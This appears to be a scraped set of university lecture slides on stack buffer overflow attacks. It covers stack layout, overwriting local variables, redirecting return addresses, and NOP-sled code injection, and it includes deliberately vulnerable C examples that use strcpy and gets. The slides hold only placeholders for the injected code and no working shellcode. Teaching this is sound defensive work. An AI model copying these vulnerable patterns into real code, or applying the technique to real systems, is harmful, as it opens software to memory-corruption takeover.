Download presentation
Presentation is loading. Please wait.
1
Buffer Overflow Attacks 1 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security
2
History 2 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 1960s1970s1990sToday1980s Vulnerability exploited on time-share machines Attacks on early networked machines Morris Worm uses buffer overflow in taking down significant portion of the Internet Buffer overflow attacks become (arguably) the most pressing security concerns facing the web (e..g., in 1998, 2/3 of CERT advisories were buffer overflow related) The problem persists (e.g., IE VML advisory from two months ago).
3
Memory Layout 3 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses
4
Memory Layout 4 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); }
![Memory Layout 4 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); }](http://images.slideplayer.com/32/9987801/slides/slide_4.jpg "Memory Layout 4 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); }")
5
Memory Layout 5 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp
![Memory Layout 5 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp](http://images.slideplayer.com/32/9987801/slides/slide_5.jpg "Memory Layout 5 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp")
6
Memory Layout 6 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp
![Memory Layout 6 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp](http://images.slideplayer.com/32/9987801/slides/slide_6.jpg "Memory Layout 6 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp")
7
Memory Layout 7 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2
![Memory Layout 7 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2](http://images.slideplayer.com/32/9987801/slides/slide_7.jpg "Memory Layout 7 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2")
8
Memory Layout 8 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1
![Memory Layout 8 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1](http://images.slideplayer.com/32/9987801/slides/slide_8.jpg "Memory Layout 8 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1")
9
Memory Layout 9 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret
![Memory Layout 9 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret](http://images.slideplayer.com/32/9987801/slides/slide_9.jpg "Memory Layout 9 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret")
10
Memory Layout 10 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp
![Memory Layout 10 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp](http://images.slideplayer.com/32/9987801/slides/slide_10.jpg "Memory Layout 10 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp")
11
Memory Layout 11 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp
![Memory Layout 11 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp](http://images.slideplayer.com/32/9987801/slides/slide_11.jpg "Memory Layout 11 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp")
12
Memory Layout 12 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp
![Memory Layout 12 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp](http://images.slideplayer.com/32/9987801/slides/slide_12.jpg "Memory Layout 12 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp")
13
Memory Layout 13 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp buffer
![Memory Layout 13 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp buffer](http://images.slideplayer.com/32/9987801/slides/slide_13.jpg "Memory Layout 13 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; } void main() { func(1,2); } pushl $2 pushl $1 call func … pushl %ebp movl %esp, %ebp subl $24, %esp sp fp 2 1 ret sfp buffer")
14
Memory Layout 14 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp buffer
![Memory Layout 14 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp buffer](http://images.slideplayer.com/32/9987801/slides/slide_14.jpg "Memory Layout 14 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp buffer")
15
Memory Layout 15 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp bigstr
![Memory Layout 15 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp bigstr](http://images.slideplayer.com/32/9987801/slides/slide_15.jpg "Memory Layout 15 Basic Idea Sample Attacks Protection , Computer & Network Security Text Data Heap Stack High Addresses Low Addresses void func(int a, int b) { char buffer[10]; strcpy(buffer, bigstr); } sp fp 2 1 ret sfp bigstr")
16
Sample Attacks 16 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
17
Modify Local Variables 17 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
18
Modify Local Variables 18 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … }
![Modify Local Variables 18 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … }](http://images.slideplayer.com/32/9987801/slides/slide_18.jpg "Modify Local Variables 18 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … }")
19
Modify Local Variables 19 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } ret sfp query subject[] recp[]
![Modify Local Variables 19 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp query subject[] recp[]](http://images.slideplayer.com/32/9987801/slides/slide_19.jpg "Modify Local Variables 19 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp query subject[] recp[]")
20
Modify Local Variables 20 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } ret sfp query subject[] recp[]
![Modify Local Variables 20 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp query subject[] recp[]](http://images.slideplayer.com/32/9987801/slides/slide_20.jpg "Modify Local Variables 20 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp query subject[] recp[]")
21
Modify Local Variables 21 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } ret sfp subject[] recp[] query
![Modify Local Variables 21 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp subject[] recp[] query](http://images.slideplayer.com/32/9987801/slides/slide_21.jpg "Modify Local Variables 21 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp subject[] recp[] query")
22
Modify Local Variables 22 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "admin@nsa.gov"; char query[8]; strcpy(query, getenv("QUERY_STRING")); //send top secret e-mail to recp … } ret sfp subject[] recp[] query Demo…
![Modify Local Variables 22 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp subject[] recp[] query Demo…](http://images.slideplayer.com/32/9987801/slides/slide_22.jpg "Modify Local Variables 22 Basic Idea Sample Attacks Protection , Computer & Network Security void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } void handleRequest() { int code; char subject[] = [[[SECRET]]] user request ; char recp[] = ; char query[8]; strcpy(query, getenv( QUERY_STRING )); //send top secret to recp … } ret sfp subject[] recp[] query Demo…")
23
Repeat Code… 23 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
24
Repeat Code… 24 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); }
![Repeat Code… 24 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); }](http://images.slideplayer.com/32/9987801/slides/slide_24.jpg "Repeat Code… 24 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); }")
25
Repeat Code… 25 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); }
![Repeat Code… 25 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); }](http://images.slideplayer.com/32/9987801/slides/slide_25.jpg "Repeat Code… 25 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp buffer void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); }")
26
Repeat Code… 26 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr
![Repeat Code… 26 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } addr](http://images.slideplayer.com/32/9987801/slides/slide_26.jpg "Repeat Code… 26 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } addr")
27
Repeat Code… 27 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } buffer
![Repeat Code… 27 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } buffer](http://images.slideplayer.com/32/9987801/slides/slide_27.jpg "Repeat Code… 27 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } buffer")
28
Repeat Code… 28 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr
![Repeat Code… 28 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } addr](http://images.slideplayer.com/32/9987801/slides/slide_28.jpg "Repeat Code… 28 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } addr")
29
Repeat Code… 29 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security b a ret sfp void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } void func(int a, int b) { printf("Inside func loop.\n"); char buffer[4]; gets(buffer); } main() { printf("about to call func.\n"); func(5,6); printf("done.\n"); } addr Demo…
![Repeat Code… 29 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } addr Demo…](http://images.slideplayer.com/32/9987801/slides/slide_29.jpg "Repeat Code… 29 Basic Idea Sample Attacks Protection , Computer & Network Security b a ret sfp void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } void func(int a, int b) { printf( Inside func loop.\n ); char buffer[4]; gets(buffer); } main() { printf( about to call func.\n ); func(5,6); printf( done.\n ); } addr Demo…")
30
Sample Attacks 30 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security Modify local variables Modify return address to skip/repeat code Modify return address to run evil code
31
Running Evil Code… 31 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 2 1 ret sfp buffer void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … }
![Running Evil Code… 31 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 ret sfp buffer void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … }](http://images.slideplayer.com/32/9987801/slides/slide_31.jpg "Running Evil Code… 31 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 ret sfp buffer void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … }")
32
Running Evil Code… 32 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
![Running Evil Code… 32 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb](http://images.slideplayer.com/32/9987801/slides/slide_32.jpg "Running Evil Code… 32 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb")
33
Running Evil Code… 33 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
![Running Evil Code… 33 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb](http://images.slideplayer.com/32/9987801/slides/slide_33.jpg "Running Evil Code… 33 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb")
34
Running Evil Code… 34 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
![Running Evil Code… 34 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb](http://images.slideplayer.com/32/9987801/slides/slide_34.jpg "Running Evil Code… 34 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb")
35
Running Evil Code… 35 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb
![Running Evil Code… 35 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb](http://images.slideplayer.com/32/9987801/slides/slide_35.jpg "Running Evil Code… 35 Basic Idea Sample Attacks Protection , Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb")
36
Running Evil Code… 36 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security 2 1 void func(int a, int b) { char buffer[32]; gets(buffer); … } void func(int a, int b) { char buffer[32]; gets(buffer); … } evil code evil code nop nop nop nop nop nop nop nop nop nop nop 0x80483eb ????
